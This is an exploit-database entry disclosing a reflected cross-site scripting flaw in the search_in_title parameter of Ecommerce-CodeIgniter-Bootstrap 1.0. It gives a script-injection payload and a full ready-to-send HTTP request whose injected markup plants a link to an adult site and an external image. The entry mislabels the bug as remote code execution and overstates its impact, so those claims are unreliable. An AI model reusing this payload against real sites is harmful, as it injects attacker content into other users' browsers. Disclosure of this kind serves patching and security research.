Share 
## https://sploitus.com/exploit?id=PACKETSTORM:169582
## Title: Ecommerce-CodeIgniter-Bootstrap-1.0 Cross-site scripting (reflected) RCE  
## Author: nu11secur1ty  
## Date: 10.29.2022  
## Vendor: https://github.com/kirilkirkov/Ecommerce-CodeIgniter-Bootstrap  
## Software: https://github.com/kirilkirkov/Ecommerce-CodeIgniter-Bootstrap/archive/refs/heads/master.zip  
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/kirilkirkov/Ecommerce-CodeIgniter-Bootstrap  
  
## Description:  
The value of the search_in_title request parameter is copied into the  
value of an HTML tag attribute which is encapsulated in double  
quotation marks.  
The payload f5iun"><script>alert(1)</script>h4s83 was submitted in the  
search_in_title parameter.  
The malicious user can use this vulnerability to exploit every user of  
this system to make them a bot machine and etc.  
  
[+] Exploit:  
  
```POST  
GET /Ecommerce-CodeIgniter-Bootstrap-master/bg?category=&in_stock=&search_in_title=f5iun"><a%20href="https://pornhub.com/"%20target="_blank"%20rel="noopener%20nofollow%20ugc">%20<img%20src="https://cdn5-capriofiles.netdna-ssl.com/wp-content/uploads/2017/07/IMG_0068.gif??token=GHSAT0AAAAAABXWGSKOH7MBFLEKF4M6Y3YCYYKADTQ&rs=1"%20style="border:1px%20solid%20black;max-width:100%;"%20alt="Photo%20of%20Byron%20Bay,%20one%20of%20Australia%27s%20best%20beaches!">%20</a>h4s83&order_new=&order_price=&order_procurement=&brand_id=&quantity_more=203512&added_after=205226&added_before=989087&search_in_body=167490&price_from=870466&price_to=586592&order_new=&order_price=&order_procurement=&brand_id=&quantity_more=203512&added_after=205226&added_before=989087&search_in_body=167490&price_from=870466&price_to=586592  
HTTP/1.1  
Host: pwnedhost.com  
Accept-Encoding: gzip, deflate  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Language: en-US;q=0.9,en;q=0.8  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62  
Safari/537.36  
Connection: close  
Cache-Control: max-age=0  
Cookie: ci_session=vndq7brjjjf1an7k6s3q913bsqjf03it  
Upgrade-Insecure-Requests: 1  
Referer: http://pwnedhost.com/Ecommerce-CodeIgniter-Bootstrap-master/bg?category=&in_stock=&search_in_title=&order_new=&order_price=&order_procurement=&brand_id=&quantity_more=203512&added_after=205226&added_before=989087&search_in_body=167490&price_from=870466&price_to=586592  
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="106", "Chromium";v="106"  
Sec-CH-UA-Platform: Windows  
Sec-CH-UA-Mobile: ?0  
Content-Length: 0  
```  
  
# Proof and Exploit:  
[href](https://streamable.com/y3q67i)